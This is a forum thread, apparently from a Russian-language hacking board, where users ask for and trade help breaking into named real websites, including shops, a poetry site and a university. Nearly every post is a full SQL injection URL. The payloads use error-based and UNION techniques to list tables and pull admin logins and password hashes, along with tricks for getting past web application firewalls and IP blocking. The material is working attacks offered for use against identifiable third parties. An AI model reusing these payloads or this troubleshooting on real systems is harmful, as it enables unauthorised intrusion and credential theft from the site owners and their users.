Ваши вопросы по уязвимостям.

Попробывал все - результат NULL
Есть ещё какие-нибудь варианты?

 

уважаемые знатоки

Доброго дня всем, люди кто нибудь сталкивался с такой ситуацией:

http://www.site.ru/ru/***/***/***/?nd_4=***&***_4=***&***_*=1'+and+(select+1+from(select+count(*),(select+concat(0x3a,password_md5,0x3a)+from+AUTH_USER+limit+1,1),floor(rand(0)*2))+having+min(0))+and+'1'='1

Message of provider: SQLSTATE[42000]: Syntax error or access violation: 1248 Every derived table must have its own alias.' in....

или как вариант запрос havij

http://www.site.ru/ru/***/***/***/?nd_4=***&***_4=***&***_*=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(password_md5)+from+AUTH_USER+limit+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'1'='1

с ошибкой вида:
Subquery returns more than 1 row.' in

 

lion-art
Я не сталкивался. Попробуй заменить + на /*--*/ , /**/ и т.д

 

http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1' (SQL Error)

Cannot get order by, any solution?

 

Thank you, Ruslan1817.

I still have a problem.

http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1'+union+select+1,2,3,4,version(),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20+--+

Then I get 5.1.41-3ubuntu12.10-log, but when I execute like this.

http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1%27+union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables%20where%20table_schema=database()+--+

And I get- Illegal mix of collations for operation 'UNION'

Why?

 

http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=1'+union+select+1,2,3,4,(%73elect(@x)%66rom(%73elect(@x:=0x00),(%73elect(null)%66rom(%69nformation_schema.%63olumns)%77here(%74able_schema!=0x696e666f726d6174696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,%63olumn_name))))x),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+

 

Thanks, can you give me a guide or paper on how to move foward.

 

er9j6@, nice but easy solution is unhex(hex())

HTML:

http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=-1%27+union+select+1,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+0,1--+1

And easy construction

 

Site has 34 tables, I found out doing this.

Code:

http://bohemianchandeliers.co.uk/prod_detail.php?id=14&cat=-1%27+union+select+1,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables+limit+33,1--+3

How do I get an info of a particular table?

 

Это русскоязычный форум. Используй переводчики.
По теме — полный FAQ

 

Thank you so much.

I've learnt it now.

Need a little help here.

Code:

http://www.shopoldcoloradocity.com/content.php?id=-97/**/union/**/select/**/1,2,3,4,version(),6,7,8,9,10,11,12--

How to get tables, columns and data?

 

lightangel
There are tables

Code:

http://www.shopoldcoloradocity.com/content.php?id=-1%27/*--*/UnIoN/*--*/SeLeCt/*--*/1,2,3,4,group_concat%28TABLE_NAME%29,6,7,8,9,10,11,12/*--*/FrOm/*--*/INFORMATION_SCHEMA.TABLES--

PHP:

Admins,access

 

Aydin-ka, thanks a lot.

Code:

http://www.shopoldcoloradocity.com/content.php?id=-1%27/**/UnIoN/**/SeLeCt/**/1,2,3,4,group_concat(TABLE_NAME),6,7,8,9,10,11,12/**/FrOm/**/INFORMATION_SCHEMA.TABLES--

It's a basic WAF..

I've got the tables and columns and now I try this.

Code:

http://www.shopoldcoloradocity.com/content.php?id=-1%27/**/UnIoN/**/SeLeCt/**/1,2,3,4,group_concat(Name,0x3a,Password),6,7,8,9,10,11,12/**/FrOm/**/Admins--

Any solution?

 

table in other db.
http://www.shopoldcoloradocity.com/content.php?id=-1/**/UnIoN/**/SeLeCt/**/1,2,3,4,concat(Name,0x3a,Password),6,7,8,9,10,11,12/**/FrOm/**/dolphin_eval.Admins

 

http://www.poetryclub.com.ua/contest.php?id=29%27+/*!union*/+/*!select*/+1,2,3,4,5+--+
Фильтр юнион...

 

избавиться от union можно с помощью error based например.

HTML:

http://www.poetryclub.com.ua/contest.php?id=29+or+1+group+by+concat((select+concat(login,0x3a,password)+from+admins),floor(rand(0)*2))having+min(0)--

 

I have a little problem here.

Code:

http://www.mul.edu.pk/home_old/index.php?id=39+order+by+20--

Shows 20 strings, now to get union select

Code:

http://www.mul.edu.pk/home_old/index.php?id=39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

Shows this error

Code:

Not Acceptable

An appropriate representation of the requested resource /home_old/index.php could not be found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Code:

http://www.mul.edu.pk/home_old/index.php?id=39/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

The same error? Why this?

 

Что вы подразумеваете под этим?

 

во как)
значит в состоянии читать по русски.
http://www.ptsecurity.ru/download/PT-devteev-CC-WAF.pdf
а на этом сайте блокируется ип после нескольких запросов, поэтому заморачиваться с проксями не хочется. good luck.

 

Thanks so much. I'll use it.